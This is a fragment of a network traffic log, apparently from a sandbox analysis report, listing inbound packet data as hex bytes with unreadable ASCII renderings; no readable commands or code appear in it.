2023-11-18 09:02:40 UTC	4083	IN	Data Raw: fa c7 bf d8 a0 87 bd a2 66 00 11 f2 84 7c 02 22 c4 66 b6 12 12 33 9b 12 b5 f6 7d 8d f7 15 33 9b 52 af f6 b2 aa 18 b0 6a de 47 72 a7 c0 fe fa 2a 30 61 bb 94 b9 af 55 00 03 f6 78 fe dc 47 45 82 8a 5a 09 29 01 11 e2 54 48 ab 75 fe dc c7 5b fe 98 f9 37 18 20 64 7b 9c f6 0d 98 f6 ca 52 ff c8 de 28 93 2e ca 56 43 be 34 03 14 24 41 79 09 c9 dd 8c 92 8c 6a ef c3 b6 dc 80 2e 9b ef 66 d8 99 0a 30 ed 0f 2a fb f2 91 1c a9 ec 2b ca ff cb 2f 61 d7 ff f2 1e be ad 32 dc 01 e8 b2 5d 55 6e 25 40 5d 5e ef e3 b9 36 34 f0 ac 92 13 9c 8b 20 7f bc 0a b8 75 f3 5b 4b 6b 03 69 a2 da 2d da f8 d1 da 40 5d 5e 0a e5 a9 c9 06 b0 90 e3 b4 63 0f ad 0d 6e 21 f7 c7 d9 7c 17 a6 d6 01 43 ec d1 48 6a fd f1 2a 70 cb 96 85 7d be ab 35 40 ad ef 2e 2e 5f 1b 7e 7a 15 90 ec 76 2f 4f 55 0c 3e a0 89 Data Ascii: f\|"f3}3RjGr0aUxGEZ)THu[7 d{R(.VC4$Ayj.f0+/a2]Un%@]^64 u[Kki-@]^cn!\|CHj*p}5@.._~zv/OU>
2023-11-18 09:02:40 UTC	4099	IN	Data Raw: 57 97 c8 a7 28 48 44 2a 48 89 75 e5 f7 40 40 d4 cf ff 39 12 b1 1d 34 c5 bb 28 9a e2 c5 40 9a 2f f5 2e 90 25 e2 4e 51 e6 04 a2 2a 06 1c 81 52 42 8e 40 11 f0 06 9e fd aa 15 90 8a 6a a7 c2 83 1b a9 1d b1 b2 5f 3e e3 10 b1 1d ad 3a 71 5f 22 56 b7 0f a7 61 34 d2 28 19 f4 b9 a3 f1 8c 88 45 45 76 e3 5c 6b 89 58 ab c9 04 95 fa a3 26 33 54 82 bc b1 ad fd 2c c6 ed 6d ed 1d 39 53 cf a1 69 89 88 b5 9a cc 02 a9 96 cf 7a 79 30 4c e6 0e e4 52 44 24 09 46 e8 d1 8f 33 87 d7 8f 20 cb da d5 1d cd 5f 70 32 df e0 96 d0 fa 11 5b cc ab 6d e5 c3 eb 47 90 b1 43 4e 89 ae 1d 72 90 2b 17 61 22 d7 0a eb 47 4a 78 fd 08 32 d6 8f d4 e1 f5 23 02 a1 45 27 5a 22 50 32 5a 2e 90 8e 97 46 12 8f 72 53 e2 6e ae ee bc e7 f5 92 b8 a7 bb 7d c5 01 24 25 d6 59 57 32 46 db 7d b5 e4 7a 1a e4 ad 00 4d Data Ascii: W(HDHu@@94(@/.%NQRB@j_>:q_"Va4(EEv\kX&3T,m9Sizy0LRD$F3 _p2[mGCNr+a"GJx2#E'Z"P2Z.FrSn}$%YW2F}zM
2023-11-18 09:02:40 UTC	4115	IN	Data Raw: 71 9e 88 83 92 2f 27 89 c6 af 71 e3 e5 fc fa f5 95 d4 29 e0 d6 2f 56 a3 48 55 1a 6d bf b5 22 69 34 ee 28 fe fd 4a c2 75 c4 01 b5 5c b3 14 4d 0a d6 7c 3c e2 2d fd ef 95 d4 25 78 32 0a 94 28 05 79 88 5f 44 1b 68 fb 65 0d 50 0a f2 0c af 88 c6 b1 68 f0 a4 c6 ad 6c ff ff 67 ea 4c 76 6c b9 6d 30 bc 3f cf 92 45 95 66 2d db 43 1c 27 b9 46 e0 38 06 7c df ff 41 52 fc 07 aa 16 0d e8 03 9b a2 54 a7 4a 23 45 21 b9 7c 20 4f 44 e3 cf a0 22 fc 00 ac 31 14 a6 fd 69 a0 e6 19 b0 90 d0 b6 c7 fd af f1 4b f1 3b 17 e1 f7 c0 09 c5 7c af 70 42 91 ef d5 33 f1 bd b3 59 12 0d 09 8e cf 84 a8 50 50 11 61 c3 1a 55 11 36 36 83 27 1d 1b dd 15 8c 66 33 ba 6d 96 8a a4 ac 78 cb b1 35 7c cb 71 0c cd ce 60 5b b4 24 c0 a5 fe 7f 57 56 5b 97 fa ef aa fe 43 59 65 ff 11 f7 1f cc 5c ad 15 35 0b 72 Data Ascii: q/'q)/VHUm"i4(Ju\M\|<-%x2(y_DhePhlgLvlm0?Ef-C'F8\|ARTJ#E!\| OD"1iK;\|pB3YPPaU66'f3mx5\|q`[$WV[CYe\5r
2023-11-18 09:02:40 UTC	4131	IN	Data Raw: b9 2a dc bc b4 41 06 72 b7 5f ab ec 03 0b 90 be 8a a1 ae 35 19 ba 42 5d 83 6c 0e dd 64 64 8e 09 5f b2 bf 0f 23 ed 38 7d e0 88 e3 76 8c 3c e2 74 5a 59 f8 73 65 65 11 64 98 5c ec 31 0f 24 e1 b4 99 70 b7 cb 66 02 64 9b a9 42 22 d2 57 c5 7b 74 fe e7 81 3c 50 0c d9 ed 81 52 c8 6e 90 e3 bc f6 64 08 44 19 83 b6 06 ea c4 21 5b 03 90 b0 68 d4 e7 06 52 ef c6 63 4d e4 38 fc 7a 24 ea 2a 88 e9 67 19 f4 52 66 41 81 eb c2 ef ef 47 22 c9 60 20 71 ed b5 43 81 c4 41 32 43 c5 cf c3 48 b3 9d 8e 2c f9 55 70 64 51 c1 3c f5 c6 62 24 e1 f4 4a f1 57 b5 bc 4d 8c 86 bb 81 8e 83 40 12 7e c1 87 57 eb 6e 5c c8 b4 dd 8d 0b 9e 16 ae ea a2 a7 05 48 6c db 1a 0f a0 e9 02 67 d5 15 72 3b ae 6b ec bd 16 c8 55 65 36 5a 23 57 85 8d 3e 39 72 a3 47 46 95 07 07 f3 54 93 b4 0d 8b 91 39 a6 dd b9 84 Data Ascii: Ar_5B]ldd_#8}v<tZYseed\1$pfdB"W{t<PRndD![hRcM8z$gRfAG"` qCA2CH,UpdQ<b$JWM@~Wn\Hlgr;kUe6Z#W>9rGFT9
2023-11-18 09:02:40 UTC	4147	IN	Data Raw: f7 95 48 4d 0d 64 2a fc aa 9f 7d bc 73 b9 1b c8 8d fb 73 16 14 bf 06 03 f7 51 df 3f 5c 90 cb dd b8 92 b0 4c c8 3a 70 71 e8 71 8c 2b d7 c1 81 a3 be 7f 92 71 e5 3a 48 5e 19 ff 88 e6 95 09 71 3b dd 12 f9 99 8f cd 3f 28 e4 a6 10 c4 ff a1 67 3e 14 c4 0f b1 1e db da a1 4c 3a 10 fb b1 ad 75 36 ab 10 eb 3a 76 fa 81 5c d0 ce e5 6e b4 5c ee c8 76 93 35 7a 2e 77 03 3e c2 59 43 3e c2 10 db b1 e5 74 d0 46 88 b0 65 64 0d db 32 06 36 32 7b fb 31 66 9e 52 07 8c 1c 59 63 e6 02 39 56 39 66 fb 58 b9 0e 8e d5 8e 23 c0 b0 91 23 c4 79 ec fa c6 ca 05 72 5e e7 29 75 5e 3e a5 92 f4 de 7b 1f 92 de b3 00 d9 65 e8 48 2a 44 e5 f4 95 95 19 97 88 dd 6d 17 73 40 fc f7 95 88 bd 6a f4 75 d6 64 68 f6 75 7e c4 31 8f 83 62 20 75 f7 f9 72 81 3e e6 f3 2b 11 95 f7 7a 1e e2 80 a8 bc 8f 9e ec d9 Data Ascii: HMd}ssQ?\L:pqq+q:H^q;?(g>L:u6:v\n\v5z.w>YC>tFed262{1fRYc9V9fX##yr^)u^>{eHDms@judhu~1b ur>+z
2023-11-18 09:02:40 UTC	4163	IN	Data Raw: c7 d7 23 91 24 66 5c de a5 c4 74 50 d3 1a b1 8b da bd ca 68 f2 9b 44 82 2f 2b 9f 4e f0 b5 06 2f bd ad 23 2f bd d7 60 2c 80 c7 91 b1 00 6b 30 b0 30 95 3b b0 70 4d 5e b2 f2 c2 8d 88 3a e6 f9 48 22 46 d4 c5 78 a4 10 01 d2 a3 0d f3 c3 f5 90 b0 73 4b 90 8f ff f9 cc 88 f5 35 0b f2 78 59 a2 38 8f 57 14 42 be d2 eb 85 48 4d 35 6c 84 e9 3c 0c a4 69 9f 0c 01 d7 eb 33 33 04 7c d1 ba e4 43 1c ad 4b 60 44 39 c0 34 b1 12 85 44 38 30 ee aa 56 44 f8 70 c2 63 1e 21 c7 58 96 84 3a 18 67 8d 9c 2e 1c a0 50 01 23 92 6d f8 6e 42 68 92 d1 f0 5e c1 73 59 a8 98 51 bd 93 11 4a 89 bc 64 15 aa 66 a4 85 9e a8 b0 bb b1 af 78 5d a9 23 10 25 ae 8a 4b 0b 78 02 12 55 4a dc 3f 9f cc 60 26 54 c4 c0 37 f8 6f 49 b8 3c 46 90 28 8f f1 ed c7 91 88 3a aa 02 c0 d8 54 75 00 d8 8a 90 84 4c 6d 26 84 Data Ascii: #$f\tPhD/+N/#/`,k00;pM^:H"FxsK5xY8WBHM5l<i33\|CK`D94D80VDpc!X:g.P#mnBh^sYQJdfx]#%KxUJ?`&T7oI<F(:TuLm&
2023-11-18 09:02:40 UTC	4179	IN	Data Raw: a8 7a ee 37 3f 20 8b e3 33 08 75 17 64 aa 68 21 f5 63 cc f8 14 fd 8f ab 9a fa 14 c5 d5 c2 7d 9f 41 0c 54 5d 10 47 19 cb c0 4d 95 0b c6 a3 e7 d3 2e 37 7b 05 f5 63 a0 23 a2 70 be c2 f4 f6 ca 57 98 2c 18 3c 86 53 06 92 35 53 c6 de f1 33 ee b9 10 5b 35 98 b0 4c d3 67 38 61 59 dc 20 cc 4c f3 21 44 e1 11 fb 28 dd 5b 89 54 55 f8 ec f9 48 46 a4 aa 4a 3f 07 45 22 71 54 5c ac 7f 93 8c ea 8b f5 c8 d9 14 47 32 ea 25 44 12 de 4e d2 27 21 c9 60 cc 01 73 38 e6 c0 26 f9 e4 58 3f d4 f0 93 e3 4d ae f3 66 54 88 55 cd 0b f7 ce da 13 81 28 7c de d8 e1 c4 01 d4 55 80 1d 4e eb 1c 51 63 de 2a e0 eb b3 ff 7d 25 aa 2a c0 43 cf 8f ab 5a 9e bb fb 9b 14 16 16 57 55 6c 61 89 68 74 38 98 7c 7b 25 32 c7 cc f0 69 42 92 51 e1 d8 ab 9e 03 a9 aa 0a 7b 89 5b 55 6d 2f d9 24 1c 7b 35 13 81 a6 Data Ascii: z7? 3udh!c}AT]GM.7{c#pW,<S5S3[5Lg8aY L!D([TUHFJ?E"qT\G2%DN'!`s8&X?MfTU(\|UNQc}%CZWUlaht8\|{%2iBQ{[Um/${5
2023-11-18 09:02:40 UTC	4195	IN	Data Raw: 4d 3b cf 39 6d dc e7 9c 8f 18 29 46 f9 d7 56 27 1c 3d 22 39 9d 3c 0e 73 3a ad 88 22 2d fb 66 a8 ce f9 81 58 7d 2a 23 24 1b ab 67 45 68 21 f5 8a ec 49 79 29 45 ca ae da 5e 28 8f 88 34 89 8d e4 42 d2 68 26 17 7a 44 52 05 59 c3 54 41 2b 48 78 8a cf d5 84 64 a3 f2 1b e7 8f c3 48 8f 5a 6b 3d c9 08 84 38 c0 16 e1 05 39 25 40 32 8e 43 61 0f 10 48 36 3a 76 c8 9f dc e0 1d f2 23 be 6c 84 81 b4 c2 b5 8e 8d b0 96 57 20 d9 18 d8 bd 5a 63 78 f7 fa fc 97 d8 c3 b9 57 d3 7b b8 47 5c 49 d8 49 a4 c7 59 25 83 3c 57 2e 19 14 22 d2 87 3c 0e a7 0f 85 18 7b b5 ad a1 d0 a1 10 5f b6 06 44 d3 0d 2d 0f 91 88 34 8e 05 a6 db d4 10 d3 6d 88 38 ed 4b 0d 9d f6 41 8c f7 47 6a 78 97 11 e2 f6 1a 10 71 1c fd 44 70 8b 96 57 20 1a ef 2c 54 af bf b6 bb 50 7d 88 88 4e d0 5c 01 59 63 5e fb 1f ec Data Ascii: M;9m)FV'="9<s:"-fX}*#$gEh!Iy)E^(4Bh&zDRYTA+HxdHZk=89%@2CaH6:v#lW ZcxW{G\IIY%<W."<{_D-4m8KAGjxqDpW ,TP}N\Yc^
2023-11-18 09:02:40 UTC	4211	IN	Data Raw: d8 10 11 7f 45 84 bf b6 16 f1 f5 49 23 f9 fa 9e a1 01 b9 32 3b 28 84 56 95 d8 3f 14 85 7f 0b a1 83 71 00 19 8f 0f 3b 08 24 1b e1 be dc 7a 39 85 86 0a 10 a4 f3 f9 f7 2b 11 ab 02 6f 9c bc 6a 44 4d 55 d5 ea 24 d9 46 4b 05 e7 b2 9c 90 6c 54 30 9e c0 21 24 64 1b 1b 29 32 bf 5e 89 d8 41 c4 33 e9 ca 18 91 86 44 54 73 ae ca 54 73 21 c2 1d 9d 1a 72 47 87 38 33 32 53 48 c6 db f1 53 0b c9 78 9c e9 e5 20 22 10 50 c6 3b 1c 10 36 de e5 80 08 11 eb 44 57 d5 b5 4e 84 18 4b 9c 5f b3 60 a5 8d 20 7b f1 5f 0b e4 aa c0 33 f1 fd eb 95 a8 b9 20 16 45 fa cf 47 57 b0 11 44 13 0c 1b d9 f8 39 2c 16 b2 71 1c 16 ff f8 fb 95 c8 c6 e1 a1 3f 1a 5c 5f 3d e2 b8 33 90 94 c8 cf 15 4f fb 3c ba 3e ed 8b cb 7f e1 d3 cb 21 99 72 79 43 ac 3e cd 10 92 8d 19 11 8e 9c f4 85 8a 0b ba e3 2c 85 ac 31 Data Ascii: EI#2;(V?q;$z9+ojDMU$FKlT0!$d)2^A3DTsTs!rG832SHSx "P;6DWNK_` {_3 EGWD9,q?\_=3O<>!ryC>,1
2023-11-18 09:02:40 UTC	4227	IN	Data Raw: 22 79 4b bb 38 40 e4 68 52 f8 73 44 8e 48 a9 bc 88 b3 e4 d6 13 56 af ba bc 57 ab 20 1c 7f 03 d6 13 86 d9 98 0b e0 88 23 9f 69 43 08 88 57 20 79 51 bd 5a dc 10 b2 cc f0 f4 55 5b 9b eb da b2 ed 88 4f 4f 77 3f 72 84 37 f2 07 ff 50 03 b7 90 ce 1b 2d 7b c8 fb 95 87 bc 91 0d e8 fb 25 40 de dd 5b 1d 98 8f 84 d5 81 61 a6 4d 27 20 92 23 86 85 93 61 57 79 c8 1b 99 7a 7c 56 bb ca 43 de 51 1e c3 11 39 da 4e ae c1 d6 de 6b d9 3d 9d 1b 00 91 bc a7 fd 2b 43 9c 25 1b e1 30 ea d5 90 4f bd c7 8c 38 00 20 8e 7c a6 23 08 20 f6 0a 71 32 fc 47 ed 25 d7 79 a3 04 c7 af 6a 90 eb bc 11 40 a3 ee 6e 9e 4d 94 bd b3 4f bd 37 7d ea fa d8 d4 e0 6e 14 d0 62 c3 8c e5 12 0a d1 3c de 80 58 1c 7f ba 40 85 0d 10 55 f8 fd 23 d4 bc 21 32 c3 1c 91 a3 a6 1d 2f 20 de aa ad 98 0c 40 ec 6e 6f f1 29 Data Ascii: "yK8@hRsDHVW #iCW yQZU[OOw?r7P-{%@[aM' #aWyz\|VCQ9Nk=+C%0O8 \|# q2G%yj@nMO7}nb<X@U#!2/ @no)
2023-11-18 09:02:40 UTC	4243	IN	Data Raw: 1f 88 1c 88 c4 bd 09 19 88 1c 33 65 15 03 f1 06 67 88 31 5f 44 72 44 e2 f4 3e 14 89 f3 c5 b2 54 a0 2e 22 79 2a 98 7c 11 c9 11 89 d3 0d 2a 12 d7 7a 2a 98 7c 11 c9 57 fa 09 3b d2 f0 c1 56 ab b7 36 00 22 39 42 74 bf aa a3 69 f8 58 9e 13 bb 42 74 fe 8e 67 22 57 88 0e 9a 6e 31 f5 75 85 e8 4e b3 e5 71 a5 10 dd 69 ce f0 c3 01 91 3c ef da 02 7a e4 e3 93 52 b3 81 3a 3b 5a ac 07 f1 fd 7f d8 e1 33 f5 5b f0 02 4d 76 24 57 18 d0 23 1f 08 d1 f1 5f 3b 14 a2 3b cd 1e 39 2c 40 24 47 88 4e e4 0a d1 b9 57 24 ec 12 20 92 23 44 f7 1b 8f 50 88 ee 34 dd ab 26 0e 85 e8 4e 33 ad bc 80 48 5e 53 6a 9d 23 0e b8 81 10 1d 47 fb 50 88 ee 34 a3 2a c9 45 24 6f 51 38 e7 22 92 df 10 1d af 4a 21 3a a8 f2 25 72 85 e8 4e b3 47 2a 30 10 c9 11 a2 e3 ab 1d 0a d1 b5 31 92 4b 0f 88 e4 08 d1 71 66 Data Ascii: 3eg1_DrD>T."y\|z\|W;V6"9BtiXBtg"Wn1uNqi<zR:;Z3[Mv$W#_;;9,@$GNW$ #DP4&N3H^Sj#GP4E$oQ8"J!:%rNG*01Kqf
2023-11-18 09:02:40 UTC	4259	IN	Data Raw: d4 f9 e4 4a a5 6e c5 94 8e 01 68 b2 22 b2 1c 3b 7a 32 cc 6e 98 ba 92 63 ef 2d 6e a5 64 74 f4 d4 5d d8 3a bf 5b 03 20 6a 55 93 79 60 2a 2b bb 15 91 c0 e1 ef 5f 42 d4 2a 6f 9d 81 28 a3 25 be 1a 10 d5 6d 29 0e e4 54 82 77 67 d1 1e 6e 26 c0 a2 a5 f0 1c ad 67 2a f3 bb 15 6d 5e 49 46 d7 bc f2 94 f0 d1 42 f3 6a c1 79 38 5a f0 b2 66 ae 91 82 31 03 51 06 76 e1 6a a1 5d f8 2d a6 60 cc 40 94 81 ed b9 5a 68 7b 3e 77 ce 1e 01 b4 59 91 36 a9 53 79 dc 9d 26 1c af 81 f2 b8 5b 71 47 28 c6 a9 3c ee b7 88 4d 2a 7f f3 ad 4d ea f4 04 ef ef 93 3a 95 e0 dd 8a 29 18 1a 10 85 b7 c4 77 9e 4a f0 6e 45 f0 9d ff f9 25 44 19 f0 df fd 83 5d c9 7f 17 ac e6 98 57 5b fe bb b7 98 e2 4c 00 bd ae 8e 45 1e d5 a2 6f e8 69 75 e0 61 ca 16 47 1e a6 d3 f2 97 a7 16 f2 17 bd 87 9d 4f 5c 47 03 b9 56 Data Ascii: Jnh";z2nc-ndt]:[ jUy`+_Bo(%m)Twgn&gm^IFBjy8Zf1Qvj]-`@Zh{>wY6Sy&[qG(<MM:)wJnE%D]W[LEoiuaGO\GV
2023-11-18 09:02:40 UTC	4275	IN	Data Raw: 6c 5c 09 8c bc 26 5e 49 60 04 91 8e 0e 69 6e d2 11 41 bc 97 93 a7 90 8d 2b 23 90 be e8 85 5c 95 68 3e be 7a e2 84 e6 83 22 0e 20 bc 2f 29 5f 67 88 c7 be de 6a 44 6e ee 50 40 45 34 e2 9d 80 80 9f 76 ac e1 13 c6 10 88 a3 8d d5 89 48 97 e1 e7 10 95 88 df 38 57 a8 44 28 2e a7 42 a1 18 bf e7 b1 16 00 dc 66 ba aa b9 57 8a 68 23 b7 4a f9 7d 62 3c f9 7d 20 8e 72 95 17 ca 34 10 89 63 06 43 48 1c 07 56 63 dc 15 45 23 74 25 10 19 1e 91 01 77 3b 3c 02 22 6e 2d aa 55 f7 99 95 fa d2 e1 59 c6 6e 1d 9e 21 a2 6d bc e6 60 12 e6 40 7c 6f b6 af bb 36 db 97 92 d9 78 41 be ee da 21 77 65 a0 b1 46 df 6a bf db 9f 51 b5 c5 a3 51 e8 74 01 c3 eb be a5 e0 ca 37 67 7f 51 a2 0c d2 e6 78 1a f4 7d 7b 7d 73 12 d9 b8 d2 c6 f8 e5 d5 93 36 06 e2 b9 af 69 40 64 e3 af 04 2d 46 36 be 33 f4 ad Data Ascii: l\&^I`inA+#\h>z" /)_gjDnP@E4vH8WD(.BfWh#J}b<} r4cCHVcE#t%w;<"n-UYn!m`@\|o6xA!weFjQQt7gQx}{}s6i@d-F63
2023-11-18 09:02:40 UTC	4291	IN	Data Raw: 8a 44 45 05 19 13 d0 48 1c c7 4f d8 48 32 e8 27 6c 0e f9 09 83 84 73 6f 72 74 7f 9c b3 41 1d cd 63 2d 91 64 d0 f7 d5 1c f2 7d 05 09 0b 6c f7 23 2d b0 1f b2 1d bb 0c 20 0b 3f 1e 3c 46 96 01 2f d3 1f 12 2e 2f 53 92 b1 0f fe f8 d5 05 de 07 1f 32 e6 ee bf 93 c3 73 77 d2 2f f5 67 16 6c 0f 62 87 2d 0e df 9d 89 2c 1c 36 c2 ff c9 02 cf f6 c9 53 f8 2f ee a0 4f e1 41 c6 5a f2 fd 8f 4f 22 09 1f d0 b7 bb 83 c3 fa f6 68 5e c9 db 36 91 38 26 0e 2c fa 06 81 24 7c 41 5b eb aa 96 b5 b5 41 3a 26 a0 91 39 ea b9 8c 02 79 ac 16 f2 73 fe fd e5 93 48 c2 d7 3c 56 16 44 96 b1 c7 b6 b9 18 91 38 22 9d d7 ce 7e 44 3a 2f c9 d8 7d bd 84 6f ab ee 9f 61 86 2e 5c 07 e1 55 ac 0b 0f 72 9d 6d 62 15 3f 80 3e 24 8e 38 9a 57 ab e4 11 67 15 9a 5f 98 c3 e6 17 8f 64 5c 2d cd 51 7d b5 0c 72 e4 db Data Ascii: DEHOH2'lsortAc-d}l#- ?<F/./S2sw/glb-,6S/OAZO"h^68&,$\|A[A:&9ysH<VD8"~D:/}oa.\Urmb?>$8Wg_d\-Q}r
2023-11-18 09:02:40 UTC	4307	IN	Data Raw: ca ff 20 50 3a 0f 1c 99 d8 79 28 24 f1 32 7b 39 05 e8 8e b3 8d a0 38 e5 2e 00 91 9c 63 83 f7 a4 30 b9 a5 c7 2c 0b 13 22 39 e7 5e 86 53 78 2f 03 b7 1b ba 4f c9 88 e4 83 91 55 f5 d6 86 22 ab e2 72 fe 75 8e 9d 88 b2 1e 58 21 9b 02 c5 a8 c7 4a c1 00 aa f9 85 4c 94 3e 26 f6 45 3c 58 4e df c1 ea 13 1f d5 6e c4 a9 28 e6 81 10 84 f3 8c 70 73 6a 61 b2 4c ec dc d9 b9 22 9e 20 00 40 39 bb 23 ea 7a 80 17 27 53 10 dd 7a 50 c8 2d 44 91 0f c8 ba 4f d2 2d 91 7c 30 78 ca ef ca 4a c1 53 02 e4 ed d5 ba 7f fe df c7 48 29 30 11 1e 1f 8f a6 09 ac 83 4f 17 25 52 71 7b e1 59 02 75 f9 d8 72 bb ca ca fb 0c ab bb 60 c5 92 af 1a 51 d7 83 79 3e 26 88 94 e2 2a 83 3e 51 e8 41 39 25 03 ca 2e 0a 5d e3 73 5f 8d 28 2b 78 81 f6 e4 52 5d 8f 96 32 e3 a2 d6 ef 4f 3d 78 b5 94 d9 72 ef c7 79 d3 Data Ascii: P:y($2{98.c0,"9^Sx/OU"ruX!JL>&E<XNn(psjaL" @9#z'SzP-DO-\|0xJSH)0O%Rq{Yur`Qy>&*>QA9%.]s_(+xR]2O=xry
2023-11-18 09:02:40 UTC	4323	IN	Data Raw: da f8 8b 2a 24 da 78 8b 27 e7 e7 4e ac 68 58 5c e6 e3 0c 1a aa b0 27 ea 1f 3f 55 a1 27 aa b5 b2 b8 ec b4 54 91 bb 96 4e 1c 55 cb 50 be 24 19 3f 91 d3 9b 14 15 f6 18 fc 88 8a 1b 5d dd f4 16 71 d2 70 6f ba 7f 83 74 76 2d 1b 61 de 70 4a e9 6b f9 78 21 8f d0 85 0a 59 b3 fd bc e6 76 a6 13 6d 74 57 41 b0 ab 2e 15 c4 5b 84 0a 42 f7 6e 97 0a e2 31 0f f1 72 33 74 a9 20 de 22 22 f6 ea d2 f6 a9 7f 38 0b 92 98 6f 38 10 5b 8c 22 76 00 e9 7a 8c 27 72 8c 90 38 dc d1 33 a0 94 13 87 3b b0 22 cc b7 0f 88 c3 1d 88 8d ab 23 1f 5b 73 83 36 20 5d d0 5d 62 c4 16 f3 1b f9 07 49 4b 15 ab 3c 9c 21 39 b6 a0 48 39 13 46 88 24 bd 96 4c 64 9c 2f 99 90 1c bf c5 5e e6 06 20 75 d5 cb 4b bf 29 15 ae 15 47 2b 6f 9f 29 4d 83 4d 1f 46 ac 33 38 d1 c6 ea a9 4b 75 a2 8d 95 e1 69 49 ea 0a 8e 40 Data Ascii: *$x'NhX\'?U'TNUP$?]qpotv-apJkx!YvmtWA.[Bn1r3t ""8o8["vz'r83;"#[s6 ]]bIK<!9H9F$Ld/^ uK)G+o)MMF38KuiI@
2023-11-18 09:02:40 UTC	4339	IN	Data Raw: 73 33 37 ae a3 b8 57 f7 f7 2b 13 c0 15 a7 fa dc 5f 39 f8 35 c4 f7 e3 82 6c cd eb b8 22 5b 9f 8b 7d 14 1f 86 ab 7d d4 b9 a8 c9 1a 5c 00 a0 b0 ea 82 9e cd 2b bf a2 67 9f 3b 4a 9c 0c 10 cd 9d 25 43 13 10 75 cc 12 28 07 a4 1e 85 85 6d 88 37 f1 82 85 ad 1e 62 61 9f 5b 59 d8 27 33 98 9d 5b ca bb 02 f1 3f bf 60 61 73 a6 be 62 61 df 5f 29 d6 ea d4 8c 1f 1b b2 3c 9f a3 16 0d 88 c0 8e d5 00 e8 b0 61 e5 57 df cd b4 63 4f 2c f3 2e d0 8a 86 59 e2 64 80 38 d4 ca 42 91 8e a8 bc 54 71 75 14 43 7d 20 5b c7 64 09 14 43 7d ab d0 0a 80 62 a8 0f fe 41 f5 90 7f f0 7e a7 1c b1 1a 8a ff fc 7e 37 2b 35 39 8a 9b d8 ac 40 0e a3 58 81 42 79 ab fe c1 9b b9 c2 6e 83 7f 90 43 35 f9 07 9f 98 39 fb 1d 85 b9 cd ca cf f0 d9 05 0a 73 5b 2f 1f db 60 c4 70 a8 51 b2 27 01 51 b9 fb 07 ff f2 47 Data Ascii: s37W+_95l"[}}\+g;J%Cu(m7ba[Y'3[?`asba_)<aWcO,.Yd8BTquC} [dC}bA~~7+59@XBynC59s[/`pQ'QG
2023-11-18 09:02:40 UTC	4355	IN	Data Raw: 2e 77 d0 a2 89 b2 55 50 6e 61 cf d7 ff 53 75 25 3b d8 c4 38 f1 fe 3f cd d7 d9 73 06 a1 41 6c 23 96 41 f0 fe 0f 42 5c 76 95 cd 2d a5 28 b1 93 4e 67 b5 cb 64 6e 79 c9 f9 2b 13 f2 22 dd ca 4b 16 7f 1c 47 d4 ca ee 3f 83 68 c6 11 4b d8 f5 60 36 90 76 00 96 5c 65 92 59 47 6b d4 2a 37 2c 8e 58 15 6e 58 7c 3b 08 c4 76 ec 5f ba f0 39 8a 12 bb 3c f7 3b 3a cc c8 08 2e 40 fc b4 bb 10 b4 38 8a 06 3a 7b eb 5f 62 29 12 7b eb 4b 8e 34 c6 03 e2 8f b3 47 5d 07 f7 d0 3a b8 8b 3f 8e 23 aa 8b 57 7d 55 c5 57 fd 65 2f 2c 3d 87 cf 3e 5a 07 b7 9d d0 f5 1b ec ab ff dc b9 58 25 e3 ea 3f df f7 94 2f b8 f9 dc 6f 77 97 69 d6 e3 28 b4 72 2e 56 ca 10 17 ab 79 b4 8c 99 3f a7 e8 50 5f 12 e4 29 6c f9 21 79 8a 31 6a 24 73 bd 23 56 85 57 7d c9 d8 5a 52 4f 89 e0 e2 88 32 ca e3 bd 23 56 05 56 Data Ascii: .wUPnaSu%;8?sAl#AB\v-(Ngdny+"KG?hK`6v\eYGk*7,XnX\|;v_9<;:.@8:{_b){K4G]:?#W}UWe/,=>ZX%?/owi(r.Vy?P_)l!y1j$s#VW}ZRO2#VV
2023-11-18 09:02:40 UTC	4371	IN	Data Raw: 88 f5 20 db a2 ab 9c 62 2f 55 76 20 1a ff 4c 0b 02 88 c6 e1 5d fa 53 15 da a4 ee 66 a9 c7 81 68 bc d9 d7 36 10 bb 82 1c dc 25 fd e1 5f c0 51 0d cb 02 05 c4 ae 40 70 d1 cc 45 70 39 c5 51 07 42 40 9c 07 08 2e 6a 21 82 cb 0c 57 aa 5d 92 cd dd eb d9 c0 3f c5 5d 02 7a 59 31 eb c5 02 d4 6e 05 a8 24 f7 1f 05 b4 58 31 cb 9d 89 ff 26 6d 74 db 72 02 b1 ab 61 5b 4e a0 71 2b 96 a5 f8 04 62 0b a7 79 00 b1 c5 7e ca 13 07 c4 79 6c 53 44 00 e2 70 9d e6 11 e8 5e dd f5 80 e6 71 df 38 40 2f 2b 76 85 78 00 dd 51 3d 70 5a fc 9d 2d e4 b4 58 cf 63 52 3b 40 ec ea b1 54 d7 40 77 54 8f 2b b2 05 e2 8d 7a 5c 91 0d 88 36 5e db 59 02 d1 06 88 21 f7 00 02 88 c3 85 ff e3 fe d5 90 ea 85 36 5a 9c f5 dd 07 00 10 6d c0 31 22 e3 72 8c 9c 62 ec 45 ef d3 07 88 f3 70 d5 b7 40 8d 36 20 ee a6 99 Data Ascii: b/Uv L]Sfh6%_Q@pEp9QB@.j!W]?]zY1n$X1&mtra[Nq+by~ylSDp^q8@/+vxQ=pZ-XcR;@T@wT+z\6^Y!6Zm1"rbEp@6
2023-11-18 09:02:40 UTC	4387	IN	Data Raw: be 4a 68 5b 88 3e a6 72 21 25 52 af e2 8e d3 b5 3a 53 13 d9 e9 74 8f 85 e8 7c 6a 93 b5 10 bb db 54 c7 42 2a 18 bd 48 5d ff cf d4 b5 24 51 6e e3 c8 7d 9d 46 e2 9f cb b6 dd 31 e3 e8 ae 09 47 8f a7 ee 7f 94 11 12 99 00 76 c8 c7 20 41 4a 7c 14 00 e2 23 e3 32 c8 5b 0e 64 d9 90 07 9c a6 f3 40 3e 32 15 83 8c dc b8 44 4d 0d 91 1b 97 e8 b0 61 be f9 e7 3c 2a 6d 6f e4 7a 47 fc cf 81 06 1b 6e 4b f1 1c c8 67 65 a1 dd b9 a9 11 e8 cd a1 bc 24 bc 7a a8 24 bc 91 2d 02 d9 88 38 2b 37 15 ff 54 8f 2e a9 ef b8 45 38 86 a2 45 d8 48 c4 3b 6b ba 2a f0 6e 24 ca b5 ff 52 8f 25 e1 ee b4 b7 88 6a 47 26 56 23 cd 62 1e 43 35 16 e7 01 39 f3 d5 02 71 ba 16 b0 9e 0f d1 02 d6 c9 dc 4d ac d1 83 26 56 90 26 aa f1 8f 73 64 62 35 72 af 3c 4b 8e 0c a6 46 c2 2e 1a b3 3a da 70 9f 86 1b 4e b7 44 Data Ascii: Jh[>r!%R:St\|jTBH]$Qn}F1Gv 